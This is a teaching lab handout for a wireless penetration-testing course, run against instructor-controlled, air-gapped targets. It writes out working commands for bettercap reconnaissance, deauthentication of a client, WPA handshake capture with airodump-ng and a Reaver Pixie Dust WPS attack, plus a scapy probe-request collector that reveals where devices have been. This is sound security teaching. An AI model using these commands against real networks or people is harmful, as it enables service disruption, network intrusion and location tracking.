Classroom Glossary Public page

Lab 10: Wireless-Pentest Cross-Cut

523 words

Chapter: 10 (Week 12) Duration: 3 hr Substrate: Alfa NIC + HackRF (instructor lab) + sandboxed AP + authorized target client Points: 8

Overview

Apply the PT-track wireless-pentest toolchain (Reaver, Bettercap, passive probe collection) to an instructor-controlled sandboxed target. All active operations target only the instructor-assigned lab infrastructure.

Authorization

  • Target AP BSSID: __________________ (provided by instructor)
  • Target client MAC: __________________ (provided by instructor; instructor-controlled machine)
  • Lab is air-gapped (no internet-facing infrastructure in scope)
  • All transmit work inside RF-shielded enclosure or isolated frequency band

Part 1: Bettercap 802.11 Reconnaissance (45 min)

# Start bettercap with Alfa NIC in monitor mode
sudo bettercap -iface wlan0mon

# In bettercap REPL:
> wifi.recon on
# Wait 60 seconds for scan to populate
> wifi.show
# Output: BSSID, SSID, channel, RSSI, encryption type, WPS, clients

Record:

  1. What encryption type is the lab AP using? (WPA2/WPA3/Open)
  2. Is WPS listed as enabled? (Look for WPS column in wifi.show output)
  3. How many clients are associated with the lab AP?
  4. What is the RSSI of the lab AP?

BLE reconnaissance:

> ble.recon on
# Wait 30 seconds
> ble.show

Record: BLE devices visible, their addresses, names, and RSSI.

Part 2: Targeted Deauthentication (15 min; instructor authorization required)

# Target the instructor-controlled client only
> wifi.deauth AA:BB:CC:DD:EE:FF   # instructor-provided client MAC

Monitor in Wireshark (on a second terminal): does the client send disassociation/deauthentication? Does it reassociate?

Run airodump-ng simultaneously and observe the EAP handshake captured when the client reconnects:

sudo airodump-ng wlan0mon --bssid <lab-AP-BSSID> -c <channel> --write lab10-handshake

If a WPA handshake is captured (Wireshark shows all 4 EAPOL messages), record: was the handshake complete?

Part 3: WPS Check + Reaver (30 min)

# Check for WPS-enabled APs in the lab environment
wash -i wlan0mon

# If the lab AP has WPS enabled (instructor will confirm):
# Attempt Pixie Dust attack
sudo reaver -i wlan0mon -b <lab-AP-BSSID> -vv -K 1 --no-associate

Expected outcomes:

WPS State Expected Result
WPS enabled, vulnerable PRNG (Pixie Dust) PIN recovered; PSK extracted
WPS enabled, locked after 3 attempts "WPS transaction failed" after lockout
WPS disabled No WPS beacon IE; wash shows no target
WPS with strong PRNG No Pixie Dust; brute-force would require ~20,000 attempts

Document which outcome you observe and why.

Part 4: Probe Request Passive Collection (30 min)

Run the passive probe-collection script from Week 12 lecture for 10 minutes:

from scapy.all import sniff
from scapy.layers.dot11 import Dot11ProbeReq, Dot11Elt
from collections import defaultdict
import time

probes = defaultdict(set)
start = time.time()

def handle(pkt):
    if pkt.haslayer(Dot11ProbeReq) and pkt.haslayer(Dot11Elt):
        src = pkt.addr2
        ssid = pkt[Dot11Elt].info.decode('utf-8', errors='replace').strip()
        if ssid:
            probes[src].add(ssid)

sniff(iface="wlan0mon", prn=handle, store=0, timeout=600)

print(f"\nProbe requests collected over {time.time()-start:.0f}s:")
for mac, ssids in sorted(probes.items()):
    addr_type = "random" if int(mac.split(':')[0], 16) & 0x02 else "public"
    print(f"  {mac} ({addr_type}): {sorted(ssids)[:5]}")

Analysis:

  1. How many unique MAC addresses sent probe requests?
  2. Of these, how many are randomised MACs (locally administered bit set)?
  3. What SSIDs are being probed for? Do any reveal previous locations (coffee shop chains, hotel networks, corporate VPN SSIDs)?
  4. For any device probing for a specific SSID: what would an evil-twin attack look like against this device?

Part 5: Pentest Methodology Note (30 min)

Write a 1-page pentest methodology note covering the findings from this lab, as if writing a brief section of a wireless engagement report:

Required sections:

  1. Finding: WPS Status (1 paragraph): What WPS state did you observe? What is the risk rating (Critical/High/Medium/Low/Informational)? What is the remediation?

  2. Finding: Deauthentication Attack Surface (1 paragraph): Does the AP support 802.11w (MFP)? What is the deauth-flood risk? What is the remediation?

  3. Finding: Probe Request PNL Leakage (1 paragraph): What does probe-request observation reveal about client devices? What privacy implications does this have? What is the remediation?

Deliverables

  • Bettercap wifi.show output (screenshot or text)
  • WPS check (wash output) + Reaver result
  • Deauth experiment result (was handshake captured? was client deauthed?)
  • Probe-request collection output (Python script output, anonymised if needed)
  • 1-page pentest methodology note (three findings)

Grading (8 points)

Item Points
Bettercap recon output with AP/client info 1.5
WPS assessment + Reaver attempt documentation 2
Probe-request analysis (uniqueness + SSID list) 1.5
Pentest methodology note (three findings, correct risk ratings) 3